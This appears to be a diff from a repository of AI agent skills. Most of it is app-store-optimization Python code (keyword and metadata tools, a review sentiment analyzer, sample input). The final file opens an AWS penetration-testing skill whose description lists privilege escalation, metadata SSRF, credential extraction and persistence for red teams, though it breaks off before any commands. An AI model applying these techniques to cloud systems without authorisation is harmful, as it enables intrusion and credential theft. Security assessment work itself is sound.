        keyword_field = self._build_keyword_field(deduplicated, max_length)

        # Calculate keyword density in description
        density = self._calculate_coverage(target_keywords, app_description)

        return {
            'keyword_field': keyword_field,
            'length': len(keyword_field),
            'remaining_chars': max_length - len(keyword_field),
            'keywords_included': keyword_field.split(','),
            'keywords_count': len(keyword_field.split(',')),
            'keywords_excluded': [kw for kw in target_keywords if kw.lower() not in keyword_field],
            'description_coverage': density,
            'optimization_tips': [
                'Keywords in title are auto-indexed - no need to repeat',
                'Use singular forms only (Apple indexes plurals automatically)',
                'No spaces between commas to maximize character usage',
                'Update keyword field with each app update to test variations'
            ]
        }

    def validate_character_limits(
        self,
        metadata: Dict[str, str]
    ) -> Dict[str, Any]:
        """
        Validate all metadata fields against platform character limits.

        Args:
            metadata: Dictionary of field_name: value

        Returns:
            Validation report with errors and warnings
        """
        validation_results = {
            'is_valid': True,
            'errors': [],
            'warnings': [],
            'field_status': {}
        }

        for field_name, value in metadata.items():
            if field_name not in self.limits:
                validation_results['warnings'].append(
                    f"Unknown field '{field_name}' for {self.platform} platform"
                )
                continue

            max_length = self.limits[field_name]
            actual_length = len(value)
            remaining = max_length - actual_length

            field_status = {
                'value': value,
                'length': actual_length,
                'limit': max_length,
                'remaining': remaining,
                'is_valid': actual_length <= max_length,
                'usage_percentage': round((actual_length / max_length) * 100, 1)
            }

            validation_results['field_status'][field_name] = field_status

            if actual_length > max_length:
                validation_results['is_valid'] = False
                validation_results['errors'].append(
                    f"'{field_name}' exceeds limit: {actual_length}/{max_length} chars"
                )
            elif remaining > max_length * 0.2:  # More than 20% unused
                validation_results['warnings'].append(
                    f"'{field_name}' under-utilizes space: {remaining} chars remaining"
                )

        return validation_results

    def calculate_keyword_density(
        self,
        text: str,
        target_keywords: List[str]
    ) -> Dict[str, Any]:
        """
        Calculate keyword density in text.

        Args:
            text: Text to analyze
            target_keywords: Keywords to check

        Returns:
            Density analysis
        """
        text_lower = text.lower()
        total_words = len(text_lower.split())

        keyword_densities = {}
        for keyword in target_keywords:
            keyword_lower = keyword.lower()
            count = text_lower.count(keyword_lower)
            density = (count / total_words * 100) if total_words > 0 else 0

            keyword_densities[keyword] = {
                'occurrences': count,
                'density_percentage': round(density, 2),
                'status': self._assess_density(density)
            }

        # Overall assessment
        total_keyword_occurrences = sum(kw['occurrences'] for kw in keyword_densities.values())
        overall_density = (total_keyword_occurrences / total_words * 100) if total_words > 0 else 0

        return {
            'total_words': total_words,
            'keyword_densities': keyword_densities,
            'overall_keyword_density': round(overall_density, 2),
            'assessment': self._assess_overall_density(overall_density),
            'recommendations': self._generate_density_recommendations(keyword_densities)
        }

    def _build_title_with_keywords(
        self,
        app_name: str,
        keywords: List[str],
        max_length: int
    ) -> Optional[str]:
        """Build title combining app name and keywords within limit."""
        separators = [' - ', ': ', ' | ']

        for sep in separators:
            for kw in keywords:
                title = f"{app_name}{sep}{kw}"
                if len(title) <= max_length:
                    return title

        return None

    def _optimize_short_description(
        self,
        app_info: Dict[str, Any],
        target_keywords: List[str]
    ) -> Dict[str, Any]:
        """Optimize Google Play short description (80 chars)."""
        max_length = self.limits['short_description']

        # Focus on unique value proposition with primary keyword
        unique_value = app_info.get('unique_value', '')
        primary_keyword = target_keywords[0] if target_keywords else ''

        # Template: [Primary Keyword] - [Unique Value]
        short_desc = f"{primary_keyword.title()} - {unique_value}"[:max_length]

        return {
            'short_description': short_desc,
            'length': len(short_desc),
            'remaining_chars': max_length - len(short_desc),
            # Compare case-insensitively: the keyword is title-cased above
            'keywords_included': [primary_keyword] if primary_keyword.lower() in short_desc.lower() else [],
            'strategy': 'keyword_value_proposition'
        }

    def _optimize_subtitle(
        self,
        app_info: Dict[str, Any],
        target_keywords: List[str]
    ) -> Dict[str, Any]:
        """Optimize Apple App Store subtitle (30 chars)."""
        max_length = self.limits['subtitle']

        # Very concise - primary keyword or key feature
        primary_keyword = target_keywords[0] if target_keywords else ''
        key_feature = app_info.get('key_features', [''])[0] if app_info.get('key_features') else ''

        options = [
            primary_keyword[:max_length],
            key_feature[:max_length],
            f"{primary_keyword} App"[:max_length]
        ]

        return {
            'subtitle_options': [opt for opt in options if opt],
            'max_length': max_length,
            'recommendation': options[0] if options else ''
        }

    def _optimize_full_description(
        self,
        app_info: Dict[str, Any],
        target_keywords: List[str]
    ) -> Dict[str, Any]:
        """Optimize full app description (4000 chars for both platforms)."""
        max_length = self.limits.get('description', self.limits.get('full_description', 4000))

        # Structure: Hook → Features → Benefits → Social Proof → CTA
        sections = []

        # Hook (with primary keyword)
        primary_keyword = target_keywords[0] if target_keywords else ''
        unique_value = app_info.get('unique_value', '')
        hook = f"{unique_value} {primary_keyword.title()} that helps you achieve more.\n\n"
        sections.append(hook)

        # Features (with keywords naturally integrated)
        features = app_info.get('key_features', [])
        if features:
            sections.append("KEY FEATURES:\n")
            for i, feature in enumerate(features[:5], 1):
                # Integrate keywords naturally
                feature_text = f"• {feature}"
                if i <= len(target_keywords):
                    keyword = target_keywords[i - 1]
                    if keyword.lower() not in feature.lower():
                        feature_text = f"• {feature} with {keyword}"
                sections.append(f"{feature_text}\n")
            sections.append("\n")

        # Benefits
        target_audience = app_info.get('target_audience', 'users')
        sections.append(f"PERFECT FOR:\n{target_audience}\n\n")

        # Social proof placeholder
        sections.append("WHY USERS LOVE US:\n")
        sections.append("Join thousands of satisfied users who have transformed their workflow.\n\n")

        # CTA
        sections.append("Download now and start experiencing the difference!")

        # Combine and validate length
        full_description = "".join(sections)
        if len(full_description) > max_length:
            full_description = full_description[:max_length - 3] + "..."

        # Calculate keyword density
        density = self.calculate_keyword_density(full_description, target_keywords)

        return {
            'full_description': full_description,
            'length': len(full_description),
            'remaining_chars': max_length - len(full_description),
            'keyword_analysis': density,
            'structure': {
                'has_hook': True,
                'has_features': len(features) > 0,
                'has_benefits': True,
                'has_cta': True
            }
        }

    def _remove_plural_duplicates(self, keywords: List[str]) -> List[str]:
        """Normalize trailing-'s' plurals to their singular form and drop duplicates."""
        deduplicated = []
        singular_set = set()

        for keyword in keywords:
            if keyword.endswith('s') and len(keyword) > 1:
                singular = keyword[:-1]
                if singular not in singular_set:
                    deduplicated.append(singular)
                    singular_set.add(singular)
            else:
                if keyword not in singular_set:
                    deduplicated.append(keyword)
                    singular_set.add(keyword)

        return deduplicated

    def _build_keyword_field(self, keywords: List[str], max_length: int) -> str:
        """Build comma-separated keyword field within character limit."""
        keyword_field = ""

        # Greedily append keywords until the next one would exceed the limit
        for keyword in keywords:
            test_field = f"{keyword_field},{keyword}" if keyword_field else keyword
            if len(test_field) <= max_length:
                keyword_field = test_field
            else:
                break

        return keyword_field

    def _calculate_coverage(self, keywords: List[str], text: str) -> Dict[str, int]:
        """Count how many times each keyword appears in the text."""
        text_lower = text.lower()
        coverage = {}

        for keyword in keywords:
            coverage[keyword] = text_lower.count(keyword.lower())

        return coverage

    def _assess_density(self, density: float) -> str:
        """Assess individual keyword density."""
        if density < 0.5:
            return "too_low"
        elif density <= 2.5:
            return "optimal"
        else:
            return "too_high"

    def _assess_overall_density(self, density: float) -> str:
        """Assess overall keyword density."""
        if density < 2:
            return "Under-optimized: Consider adding more keyword variations"
        elif density <= 5:
            return "Optimal: Good keyword integration without stuffing"
        elif density <= 8:
            return "High: Approaching keyword stuffing - reduce keyword usage"
        else:
            return "Too High: Keyword stuffing detected - rewrite for natural flow"

    def _generate_density_recommendations(
        self,
        keyword_densities: Dict[str, Dict[str, Any]]
    ) -> List[str]:
        """Generate recommendations based on keyword density analysis."""
        recommendations = []

        for keyword, data in keyword_densities.items():
            if data['status'] == 'too_low':
                recommendations.append(
                    f"Increase usage of '{keyword}' - currently only {data['occurrences']} times"
                )
            elif data['status'] == 'too_high':
                recommendations.append(
                    f"Reduce usage of '{keyword}' - appears {data['occurrences']} times (keyword stuffing risk)"
                )

        if not recommendations:
            recommendations.append("Keyword density is well-balanced")

        return recommendations

    def _recommend_title_option(self, options: List[Dict[str, Any]]) -> str:
        """Recommend best title option based on strategy."""
        if not options:
            return "No valid options available"

        # Prefer brand_plus_primary for established apps
        for option in options:
            if option['strategy'] == 'brand_plus_primary':
                return f"Recommended: '{option['title']}' (Balance of brand and SEO)"

        # Fall back to the first option
        return f"Recommended: '{options[0]['title']}' ({options[0]['strategy']})"


def optimize_app_metadata(
    platform: str,
    app_info: Dict[str, Any],
    target_keywords: List[str]
) -> Dict[str, Any]:
    """
    Convenience function to optimize all metadata fields.

    Args:
        platform: 'apple' or 'google'
        app_info: App information dictionary
        target_keywords: Target keywords list

    Returns:
        Complete metadata optimization package
    """
    optimizer = MetadataOptimizer(platform)

    return {
        'platform': platform,
        'title': optimizer.optimize_title(
            app_info['name'],
            target_keywords
        ),
        'description': optimizer.optimize_description(
            app_info,
            target_keywords,
            'full'
        ),
        # The dedicated keyword field only exists on the Apple App Store
        'keyword_field': optimizer.optimize_keyword_field(
            target_keywords
        ) if platform == 'apple' else None
    }
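The greedy packing in `_build_keyword_field` can be exercised in isolation. A minimal standalone sketch (hypothetical keywords; the 100-character default mirrors Apple's keyword field limit):

```python
# Standalone sketch of the greedy keyword-field packing above (not part of the module).
def build_keyword_field(keywords, max_length=100):
    field = ""
    for kw in keywords:
        candidate = f"{field},{kw}" if field else kw
        if len(candidate) <= max_length:
            field = candidate
        else:
            break  # stop at the first keyword that no longer fits
    return field

print(build_keyword_field(["fitness", "workout", "tracker"], max_length=20))
# → "fitness,workout"  ("...,tracker" would be 23 chars, over the limit)
```

Because packing stops at the first overflow, keyword order matters: put the highest-value keywords first.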
714
skills/app-store-optimization/review_analyzer.py
Normal file
@@ -0,0 +1,714 @@
"""
Review analysis module for App Store Optimization.
Analyzes user reviews for sentiment, issues, and feature requests.
"""

from typing import Dict, List, Any, Optional, Tuple
from collections import Counter
import re


class ReviewAnalyzer:
    """Analyzes user reviews for actionable insights."""

    # Sentiment keywords
    POSITIVE_KEYWORDS = [
        'great', 'awesome', 'excellent', 'amazing', 'love', 'best', 'perfect',
        'fantastic', 'wonderful', 'brilliant', 'outstanding', 'superb'
    ]

    NEGATIVE_KEYWORDS = [
        'bad', 'terrible', 'awful', 'horrible', 'hate', 'worst', 'useless',
        'broken', 'crash', 'bug', 'slow', 'disappointing', 'frustrating'
    ]

    # Issue indicators
    ISSUE_KEYWORDS = [
        'crash', 'bug', 'error', 'broken', 'not working', 'doesnt work',
        'freezes', 'slow', 'laggy', 'glitch', 'problem', 'issue', 'fail'
    ]

    # Feature request indicators
    FEATURE_REQUEST_KEYWORDS = [
        'wish', 'would be nice', 'should add', 'need', 'want', 'hope',
        'please add', 'missing', 'lacks', 'feature request'
    ]

    def __init__(self, app_name: str):
        """
        Initialize review analyzer.

        Args:
            app_name: Name of the app
        """
        self.app_name = app_name
        self.reviews = []
        self.analysis_cache = {}

    def analyze_sentiment(
        self,
        reviews: List[Dict[str, Any]]
    ) -> Dict[str, Any]:
        """
        Analyze sentiment across reviews.

        Args:
            reviews: List of review dicts with 'text', 'rating', 'date'

        Returns:
            Sentiment analysis summary
        """
        self.reviews = reviews

        sentiment_counts = {
            'positive': 0,
            'neutral': 0,
            'negative': 0
        }

        detailed_sentiments = []

        for review in reviews:
            text = review.get('text', '').lower()
            rating = review.get('rating', 3)

            # Calculate sentiment score
            sentiment_score = self._calculate_sentiment_score(text, rating)
            sentiment_category = self._categorize_sentiment(sentiment_score)

            sentiment_counts[sentiment_category] += 1

            detailed_sentiments.append({
                'review_id': review.get('id', ''),
                'rating': rating,
                'sentiment_score': sentiment_score,
                'sentiment': sentiment_category,
                'text_preview': text[:100] + '...' if len(text) > 100 else text
            })

        # Calculate percentages
        total = len(reviews)
        sentiment_distribution = {
            'positive': round((sentiment_counts['positive'] / total) * 100, 1) if total > 0 else 0,
            'neutral': round((sentiment_counts['neutral'] / total) * 100, 1) if total > 0 else 0,
            'negative': round((sentiment_counts['negative'] / total) * 100, 1) if total > 0 else 0
        }

        # Calculate average rating
        avg_rating = sum(r.get('rating', 0) for r in reviews) / total if total > 0 else 0

        return {
            'total_reviews_analyzed': total,
            'average_rating': round(avg_rating, 2),
            'sentiment_distribution': sentiment_distribution,
            'sentiment_counts': sentiment_counts,
            'sentiment_trend': self._assess_sentiment_trend(sentiment_distribution),
            'detailed_sentiments': detailed_sentiments[:50]  # Limit output size
        }

    def extract_common_themes(
        self,
        reviews: List[Dict[str, Any]],
        min_mentions: int = 3
    ) -> Dict[str, Any]:
        """
        Extract frequently mentioned themes and topics.

        Args:
            reviews: List of review dicts
            min_mentions: Minimum mentions to be considered common

        Returns:
            Common themes analysis
        """
        # Extract all words from reviews
        all_words = []
        all_phrases = []

        for review in reviews:
            text = review.get('text', '').lower()
            # Strip punctuation
            text = re.sub(r'[^\w\s]', ' ', text)
            words = text.split()

            # Filter out stop words and very short words
            stop_words = {
                'the', 'and', 'for', 'with', 'this', 'that', 'from', 'have',
                'app', 'apps', 'very', 'really', 'just', 'but', 'not', 'you'
            }
            words = [w for w in words if w not in stop_words and len(w) > 3]

            all_words.extend(words)

            # Extract two-word phrases (bigrams)
            for i in range(len(words) - 1):
                phrase = f"{words[i]} {words[i+1]}"
                all_phrases.append(phrase)

        # Count frequency
        word_freq = Counter(all_words)
        phrase_freq = Counter(all_phrases)

        # Keep only items mentioned at least min_mentions times
        common_words = [
            {'word': word, 'mentions': count}
            for word, count in word_freq.most_common(30)
            if count >= min_mentions
        ]

        common_phrases = [
            {'phrase': phrase, 'mentions': count}
            for phrase, count in phrase_freq.most_common(20)
            if count >= min_mentions
        ]

        # Categorize themes
        themes = self._categorize_themes(common_words, common_phrases)

        return {
            'common_words': common_words,
            'common_phrases': common_phrases,
            'identified_themes': themes,
            'insights': self._generate_theme_insights(themes)
        }

    def identify_issues(
        self,
        reviews: List[Dict[str, Any]],
        rating_threshold: int = 3
    ) -> Dict[str, Any]:
        """
        Identify bugs, crashes, and other issues from reviews.

        Args:
            reviews: List of review dicts
            rating_threshold: Only analyze reviews at or below this rating

        Returns:
            Issue identification report
        """
        issues = []

        for review in reviews:
            rating = review.get('rating', 5)
            if rating > rating_threshold:
                continue

            text = review.get('text', '').lower()

            # Check for issue keywords
            mentioned_issues = []
            for keyword in self.ISSUE_KEYWORDS:
                if keyword in text:
                    mentioned_issues.append(keyword)

            if mentioned_issues:
                issues.append({
                    'review_id': review.get('id', ''),
                    'rating': rating,
                    'date': review.get('date', ''),
                    'issue_keywords': mentioned_issues,
                    'text': text[:200] + '...' if len(text) > 200 else text
                })

        # Count keyword frequency across all flagged reviews
        issue_frequency = Counter()
        for issue in issues:
            for keyword in issue['issue_keywords']:
                issue_frequency[keyword] += 1

        # Categorize issues
        categorized_issues = self._categorize_issues(issues)

        # Calculate issue severity
        severity_scores = self._calculate_issue_severity(
            categorized_issues,
            len(reviews)
        )

        return {
            'total_issues_found': len(issues),
            'issue_frequency': dict(issue_frequency.most_common(15)),
            'categorized_issues': categorized_issues,
            'severity_scores': severity_scores,
            'top_issues': self._rank_issues_by_severity(severity_scores),
            'recommendations': self._generate_issue_recommendations(
                categorized_issues,
                severity_scores
            )
        }

    def find_feature_requests(
        self,
        reviews: List[Dict[str, Any]]
    ) -> Dict[str, Any]:
        """
        Extract feature requests and desired improvements.

        Args:
            reviews: List of review dicts

        Returns:
            Feature request analysis
        """
        feature_requests = []

        for review in reviews:
            text = review.get('text', '').lower()
            rating = review.get('rating', 3)

            # Check for feature request indicators
            is_feature_request = any(
                keyword in text
                for keyword in self.FEATURE_REQUEST_KEYWORDS
            )

            if is_feature_request:
                # Extract the specific request
                request_text = self._extract_feature_request_text(text)

                feature_requests.append({
                    'review_id': review.get('id', ''),
                    'rating': rating,
                    'date': review.get('date', ''),
                    'request_text': request_text,
                    'full_review': text[:200] + '...' if len(text) > 200 else text
                })

        # Cluster similar requests
        clustered_requests = self._cluster_feature_requests(feature_requests)

        # Prioritize based on frequency and rating context
        prioritized_requests = self._prioritize_feature_requests(clustered_requests)

        return {
            'total_feature_requests': len(feature_requests),
            'clustered_requests': clustered_requests,
            'prioritized_requests': prioritized_requests,
            'implementation_recommendations': self._generate_feature_recommendations(
                prioritized_requests
            )
        }

    def track_sentiment_trends(
        self,
        reviews_by_period: Dict[str, List[Dict[str, Any]]]
    ) -> Dict[str, Any]:
        """
        Track sentiment changes over time.

        Args:
            reviews_by_period: Dict mapping period name to its reviews

        Returns:
            Trend analysis
        """
        trends = []

        for period, reviews in reviews_by_period.items():
            sentiment = self.analyze_sentiment(reviews)

            trends.append({
                'period': period,
                'total_reviews': len(reviews),
                'average_rating': sentiment['average_rating'],
                'positive_percentage': sentiment['sentiment_distribution']['positive'],
                'negative_percentage': sentiment['sentiment_distribution']['negative']
            })

        # Compare first and last periods to determine trend direction
        if len(trends) >= 2:
            first_period = trends[0]
            last_period = trends[-1]

            rating_change = last_period['average_rating'] - first_period['average_rating']
            sentiment_change = last_period['positive_percentage'] - first_period['positive_percentage']

            trend_direction = self._determine_trend_direction(
                rating_change,
                sentiment_change
            )
        else:
            trend_direction = 'insufficient_data'

        return {
            'periods_analyzed': len(trends),
            'trend_data': trends,
            'trend_direction': trend_direction,
            'insights': self._generate_trend_insights(trends, trend_direction)
        }

    def generate_response_templates(
        self,
        issue_category: str
    ) -> List[Dict[str, str]]:
        """
        Generate response templates for common review scenarios.

        Args:
            issue_category: Category of issue ('crash', 'feature_request', 'positive', etc.)

        Returns:
            Response templates
        """
        templates = {
            'crash': [
                {
                    'scenario': 'App crash reported',
                    'template': "Thank you for bringing this to our attention. We're sorry you experienced a crash. "
                                "Our team is investigating this issue. Could you please share more details about when "
                                "this occurred (device model, iOS/Android version) by contacting support@[company].com? "
                                "We're committed to fixing this quickly."
                },
                {
                    'scenario': 'Crash already fixed',
                    'template': "Thank you for your feedback. We've identified and fixed this crash issue in version [X.X]. "
                                "Please update to the latest version. If the problem persists, please reach out to "
                                "support@[company].com and we'll help you directly."
                }
            ],
            'bug': [
                {
                    'scenario': 'Bug reported',
                    'template': "Thanks for reporting this bug. We take these issues seriously. Our team is looking into it "
                                "and we'll have a fix in an upcoming update. We appreciate your patience and will notify you "
                                "when it's resolved."
                }
            ],
            'feature_request': [
                {
                    'scenario': 'Feature request received',
                    'template': "Thank you for this suggestion! We're always looking to improve [app_name]. We've added your "
                                "request to our roadmap and will consider it for a future update. Follow us @[social] for "
                                "updates on new features."
                },
                {
                    'scenario': 'Feature already planned',
                    'template': "Great news! This feature is already on our roadmap and we're working on it. Stay tuned for "
                                "updates in the coming months. Thanks for your feedback!"
                }
            ],
            'positive': [
                {
                    'scenario': 'Positive review',
                    'template': "Thank you so much for your kind words! We're thrilled that you're enjoying [app_name]. "
                                "Reviews like yours motivate our team to keep improving. If you ever have suggestions, "
                                "we'd love to hear them!"
                }
            ],
            'negative_general': [
                {
                    'scenario': 'General complaint',
                    'template': "We're sorry to hear you're not satisfied with your experience. We'd like to make this right. "
                                "Please contact us at support@[company].com so we can understand the issue better and help "
                                "you directly. Thank you for giving us a chance to improve."
                }
            ]
        }

        return templates.get(issue_category, templates['negative_general'])

    def _calculate_sentiment_score(self, text: str, rating: int) -> float:
        """Calculate sentiment score (-1 to 1)."""
        # Start with a rating-based score: map 1-5 stars onto -1..1
        rating_score = (rating - 3) / 2

        # Adjust based on sentiment keywords found in the text
        positive_count = sum(1 for keyword in self.POSITIVE_KEYWORDS if keyword in text)
        negative_count = sum(1 for keyword in self.NEGATIVE_KEYWORDS if keyword in text)

        text_score = (positive_count - negative_count) / 10  # Rough normalization

        # Weighted average (60% rating, 40% text)
        final_score = (rating_score * 0.6) + (text_score * 0.4)

        return max(min(final_score, 1.0), -1.0)

    def _categorize_sentiment(self, score: float) -> str:
        """Categorize sentiment score."""
        if score > 0.3:
            return 'positive'
        elif score < -0.3:
            return 'negative'
        else:
            return 'neutral'

    def _assess_sentiment_trend(self, distribution: Dict[str, float]) -> str:
        """Assess overall sentiment trend."""
        positive = distribution['positive']
        negative = distribution['negative']

        if positive > 70:
            return 'very_positive'
        elif positive > 50:
            return 'positive'
        elif negative > 50:
            # Check the more severe threshold first; otherwise it is unreachable
            return 'critical'
        elif negative > 30:
            return 'concerning'
        else:
            return 'mixed'

    def _categorize_themes(
        self,
        common_words: List[Dict[str, Any]],
        common_phrases: List[Dict[str, Any]]
    ) -> Dict[str, List[str]]:
        """Categorize themes from words and phrases."""
        themes = {
            'features': [],
            'performance': [],
            'usability': [],
            'support': [],
            'pricing': []
        }

        # Keywords for each category
        feature_keywords = {'feature', 'functionality', 'option', 'tool'}
        performance_keywords = {'fast', 'slow', 'crash', 'lag', 'speed', 'performance'}
        usability_keywords = {'easy', 'difficult', 'intuitive', 'confusing', 'interface', 'design'}
        support_keywords = {'support', 'help', 'customer', 'service', 'response'}
        pricing_keywords = {'price', 'cost', 'expensive', 'cheap', 'subscription', 'free'}

        for word_data in common_words:
            word = word_data['word']
            if any(kw in word for kw in feature_keywords):
                themes['features'].append(word)
            elif any(kw in word for kw in performance_keywords):
                themes['performance'].append(word)
            elif any(kw in word for kw in usability_keywords):
                themes['usability'].append(word)
            elif any(kw in word for kw in support_keywords):
                themes['support'].append(word)
            elif any(kw in word for kw in pricing_keywords):
                themes['pricing'].append(word)

        return {k: v for k, v in themes.items() if v}  # Remove empty categories

    def _generate_theme_insights(self, themes: Dict[str, List[str]]) -> List[str]:
        """Generate insights from themes."""
        insights = []

        for category, keywords in themes.items():
            if keywords:
                insights.append(
                    f"{category.title()}: Users frequently mention {', '.join(keywords[:3])}"
                )

        return insights[:5]

    def _categorize_issues(self, issues: List[Dict[str, Any]]) -> Dict[str, List[Dict[str, Any]]]:
        """Categorize issues by type."""
        categories = {
            'crashes': [],
            'bugs': [],
            'performance': [],
            'compatibility': []
        }

        for issue in issues:
            keywords = issue['issue_keywords']

            if 'crash' in keywords or 'freezes' in keywords:
                categories['crashes'].append(issue)
            elif 'bug' in keywords or 'error' in keywords or 'broken' in keywords:
                categories['bugs'].append(issue)
            elif 'slow' in keywords or 'laggy' in keywords:
                categories['performance'].append(issue)
            else:
                categories['compatibility'].append(issue)

        return {k: v for k, v in categories.items() if v}

    def _calculate_issue_severity(
        self,
        categorized_issues: Dict[str, List[Dict[str, Any]]],
        total_reviews: int
    ) -> Dict[str, Dict[str, Any]]:
        """Calculate severity scores for each issue category."""
        severity_scores = {}

        for category, issues in categorized_issues.items():
            count = len(issues)
            percentage = (count / total_reviews) * 100 if total_reviews > 0 else 0

            # Average rating of the affected reviews
            avg_rating = sum(i['rating'] for i in issues) / count if count > 0 else 0

            # Severity score (0-100): weights prevalence and how low the ratings are
            severity = min((percentage * 10) + ((5 - avg_rating) * 10), 100)

            severity_scores[category] = {
                'count': count,
                'percentage': round(percentage, 2),
                'average_rating': round(avg_rating, 2),
                'severity_score': round(severity, 1),
                'priority': 'critical' if severity > 70 else ('high' if severity > 40 else 'medium')
            }

        return severity_scores

    def _rank_issues_by_severity(
        self,
        severity_scores: Dict[str, Dict[str, Any]]
    ) -> List[Dict[str, Any]]:
        """Rank issues by severity score, highest first."""
        ranked = sorted(
            [{'category': cat, **data} for cat, data in severity_scores.items()],
            key=lambda x: x['severity_score'],
            reverse=True
        )
        return ranked

    def _generate_issue_recommendations(
        self,
        categorized_issues: Dict[str, List[Dict[str, Any]]],
        severity_scores: Dict[str, Dict[str, Any]]
    ) -> List[str]:
        """Generate recommendations for addressing issues."""
        recommendations = []

        for category, score_data in severity_scores.items():
            if score_data['priority'] == 'critical':
                recommendations.append(
                    f"URGENT: Address {category} issues immediately - affecting {score_data['percentage']}% of reviews"
                )
            elif score_data['priority'] == 'high':
                recommendations.append(
                    f"HIGH PRIORITY: Focus on {category} issues in next update"
                )

        return recommendations

    def _extract_feature_request_text(self, text: str) -> str:
        """Extract the specific feature request from review text."""
        # Simple extraction: return the first sentence containing a request keyword
        sentences = text.split('.')
        for sentence in sentences:
            if any(keyword in sentence for keyword in self.FEATURE_REQUEST_KEYWORDS):
                return sentence.strip()
        return text[:100]  # Fallback: first 100 characters

    def _cluster_feature_requests(
        self,
        feature_requests: List[Dict[str, Any]]
    ) -> List[Dict[str, Any]]:
        """Cluster similar feature requests."""
        # Simplified clustering: group requests that share distinctive words
        clusters = {}

        for request in feature_requests:
            text = request['request_text'].lower()
            # Keep only longer, more distinctive words
            words = [w for w in text.split() if len(w) > 4]

            # Try to find a matching cluster
            matched = False
            for cluster_key in clusters:
                if any(word in cluster_key for word in words[:3]):
                    clusters[cluster_key].append(request)
                    matched = True
                    break

            if not matched and words:
                cluster_key = ' '.join(words[:2])
                clusters[cluster_key] = [request]

        return [
            {'feature_theme': theme, 'request_count': len(requests), 'examples': requests[:3]}
            for theme, requests in clusters.items()
        ]

    def _prioritize_feature_requests(
        self,
        clustered_requests: List[Dict[str, Any]]
    ) -> List[Dict[str, Any]]:
        """Prioritize feature requests by frequency, keeping the top 10."""
        return sorted(
            clustered_requests,
            key=lambda x: x['request_count'],
            reverse=True
        )[:10]

    def _generate_feature_recommendations(
        self,
        prioritized_requests: List[Dict[str, Any]]
    ) -> List[str]:
        """Generate recommendations for feature requests."""
        recommendations = []

        if prioritized_requests:
            top_request = prioritized_requests[0]
            recommendations.append(
                f"Most requested feature: {top_request['feature_theme']} "
                f"({top_request['request_count']} mentions) - consider for next major release"
            )

        if len(prioritized_requests) > 1:
            recommendations.append(
                f"Also consider: {prioritized_requests[1]['feature_theme']}"
            )

        return recommendations

    def _determine_trend_direction(
        self,
        rating_change: float,
        sentiment_change: float
    ) -> str:
        """Determine overall trend direction."""
        if rating_change > 0.2 and sentiment_change > 5:
            return 'improving'
        elif rating_change < -0.2 and sentiment_change < -5:
            return 'declining'
        else:
            return 'stable'

def _generate_trend_insights(
|
||||||
|
self,
|
||||||
|
trends: List[Dict[str, Any]],
|
||||||
|
trend_direction: str
|
||||||
|
) -> List[str]:
|
||||||
|
"""Generate insights from trend analysis."""
|
||||||
|
insights = []
|
||||||
|
|
||||||
|
if trend_direction == 'improving':
|
||||||
|
insights.append("Positive trend: User satisfaction is increasing over time")
|
||||||
|
elif trend_direction == 'declining':
|
||||||
|
insights.append("WARNING: User satisfaction is declining - immediate action needed")
|
||||||
|
else:
|
||||||
|
insights.append("Sentiment is stable - maintain current quality")
|
||||||
|
|
||||||
|
# Review velocity insight
|
||||||
|
if len(trends) >= 2:
|
||||||
|
recent_reviews = trends[-1]['total_reviews']
|
||||||
|
previous_reviews = trends[-2]['total_reviews']
|
||||||
|
|
||||||
|
if recent_reviews > previous_reviews * 1.5:
|
||||||
|
insights.append("Review volume increasing - growing user base or recent controversy")
|
||||||
|
|
||||||
|
return insights
|
||||||
|
|
||||||
|
|
||||||
|
def analyze_reviews(
|
||||||
|
app_name: str,
|
||||||
|
reviews: List[Dict[str, Any]]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Convenience function to perform comprehensive review analysis.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_name: App name
|
||||||
|
reviews: List of review dictionaries
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete review analysis
|
||||||
|
"""
|
||||||
|
analyzer = ReviewAnalyzer(app_name)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'sentiment_analysis': analyzer.analyze_sentiment(reviews),
|
||||||
|
'common_themes': analyzer.extract_common_themes(reviews),
|
||||||
|
'issues_identified': analyzer.identify_issues(reviews),
|
||||||
|
'feature_requests': analyzer.find_feature_requests(reviews)
|
||||||
|
}
|
||||||
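
The thresholds in `_determine_trend_direction` can be exercised in isolation; a minimal standalone replica of the logic above (the sample inputs are illustrative, not taken from the module):

```python
# Standalone replica of the trend-direction thresholds used above,
# handy for sanity-checking boundary values.
def determine_trend_direction(rating_change: float, sentiment_change: float) -> str:
    if rating_change > 0.2 and sentiment_change > 5:
        return 'improving'
    elif rating_change < -0.2 and sentiment_change < -5:
        return 'declining'
    else:
        return 'stable'

print(determine_trend_direction(0.3, 8.0))     # improving
print(determine_trend_direction(-0.5, -12.0))  # declining
print(determine_trend_direction(0.1, 9.0))     # stable (rating change below threshold)
```

Note that both the rating and sentiment deltas must clear their thresholds before the direction moves off `stable`.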
30
skills/app-store-optimization/sample_input.json
Normal file
@@ -0,0 +1,30 @@
{
  "request_type": "keyword_research",
  "app_info": {
    "name": "TaskFlow Pro",
    "category": "Productivity",
    "target_audience": "Professionals aged 25-45 working in teams",
    "key_features": [
      "AI-powered task prioritization",
      "Team collaboration tools",
      "Calendar integration",
      "Cross-platform sync"
    ],
    "unique_value": "AI automatically prioritizes your tasks based on deadlines and importance"
  },
  "target_keywords": [
    "task manager",
    "productivity app",
    "todo list",
    "team collaboration",
    "project management"
  ],
  "competitors": [
    "Todoist",
    "Any.do",
    "Microsoft To Do",
    "Things 3"
  ],
  "platform": "both",
  "language": "en-US"
}
402
skills/aws-penetration-testing/SKILL.md
Normal file
@@ -0,0 +1,402 @@
---
name: AWS Penetration Testing
description: This skill should be used when the user asks to "pentest AWS", "test AWS security", "enumerate IAM", "exploit cloud infrastructure", "AWS privilege escalation", "S3 bucket testing", "metadata SSRF", "Lambda exploitation", or needs guidance on Amazon Web Services security assessment.
---

# AWS Penetration Testing

## Purpose

Provide comprehensive techniques for penetration testing AWS cloud environments. Covers IAM enumeration, privilege escalation, SSRF to the metadata endpoint, S3 bucket exploitation, Lambda code extraction, and persistence techniques for red team operations.

## Inputs/Prerequisites

- AWS CLI configured with credentials
- Valid AWS credentials (even low-privilege)
- Understanding of the AWS IAM model
- Python 3, boto3 library
- Tools: Pacu, Prowler, ScoutSuite, SkyArk

## Outputs/Deliverables

- IAM privilege escalation paths
- Extracted credentials and secrets
- Compromised EC2/Lambda/S3 resources
- Persistence mechanisms
- Security audit findings

---

## Essential Tools

